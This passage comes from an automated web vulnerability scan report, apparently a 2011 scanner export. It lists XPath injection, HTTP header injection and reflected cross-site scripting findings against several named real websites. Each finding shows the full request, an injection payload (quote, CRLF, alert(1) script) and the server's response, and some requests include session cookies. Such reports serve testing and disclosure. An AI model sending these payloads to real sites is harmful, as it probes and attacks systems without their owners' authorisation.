Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.6. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Social_Applications_Polls/fd03p00v00apoll

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Social_Applications_Polls/fd03p00v00apoll?args=tid:LATEST;&widgetId=PTWidget1&cdsn=95&config=mspPolls0001'&pttv=2&includeCSS=false&nav=mspPolls HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.7. http://community.petco.com/n/blogs/blog.aspx [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /n/blogs/blog.aspx

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /n/blogs/blog.aspx?webtag=fd03p00v00b1&widgetId=PTWidget0&pttv=2&nav=widget&config=recentBlogPosts0001'&includeCSS=false&cdsn=282 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11034

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.8. http://community.petco.com/n/pfx/forum.aspx [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /n/pfx/forum.aspx

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /n/pfx/forum.aspx?webtag=fd03p00v01d1&widgetId=PTWidget2&pttv=2&nav=widget&config=recentDiscussions0001'&includeCSS=false&cdsn=568 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

4. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload e5eb5%0d%0abd0c019c16 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=e5eb5%0d%0abd0c019c16&va=1&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e5eb5
bd0c019c16
=1; expires=Wed, 15-Jun-11 02:02:03 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


4.2. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 79b52%0d%0abc60156776a was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=ForrentCriteo&va=79b52%0d%0abc60156776a&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: ForrentCriteo=79b52
bc60156776a
; expires=Wed, 15-Jun-11 02:02:10 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


5. Cross-site scripting (reflected)  previous  next
There are 76 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 19f96<script>alert(1)</script>8320cd70653 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 16 May 2011 01:57:59 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653

5.2. http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /TGI2/proc/stateselector.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c35a'%3balert(1)//bd29db8f83c was submitted in the br parameter. This input was echoed as 9c35a';alert(1)//bd29db8f83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a'%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:40:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   State Selector
</title><link hre
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.3. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e96a0'%3balert(1)//af8feb44cf2 was submitted in the br parameter. This input was echoed as e96a0';alert(1)//af8feb44cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=e96a0'%3balert(1)//af8feb44cf2&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Error Page
</title><link href="/
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=e96a0';alert(1)//af8feb44cf2;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.4. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript rest-of-line comment. The payload 7a27f%0aalert(1)//47046b6433b was submitted in the br parameter. This input was echoed as 7a27f
alert(1)//47046b6433b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=tgdirect9c35a%27;alert(1)//bd29db8f83c7a27f%0aalert(1)//47046b6433b&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Error Page
</title><link href="/
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c7a27f
alert(1)//47046b6433b
;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.5. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e0dc'%3balert(1)//3841c1206 was submitted in the u parameter. This input was echoed as 7e0dc';alert(1)//3841c1206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=7e0dc'%3balert(1)//3841c1206 HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7Czrdrej4AXZ8pDrsX0VgpEAStDpKdrJ%2Bjt8TcUQh7JEOS2lpVt46GDr7rvlDUY4fj1zvpyDAc48qo6uZg9V7WVnv%2BrAVuXj2fOo72VUX75CXKS64EYxHT95mYYbhrAVqhPvHaTa5e8RxWCFR9XVY0qBe5iz2LQAMXuiv67NNUR5gxgPgYkDS3NnLsO3iBknvJqxJ21wxzPKXpQVnxSmYLM4l4T8thhKB4P%2FB1jXyYokWXN2dthtJxpxLl3VAiZ10BJwG2%2BUx2Wpqu7FF82cSnA%2FJ351T5nkuzQp36SjNgpw4%3D

Response

HTTP/1.1 200 OK
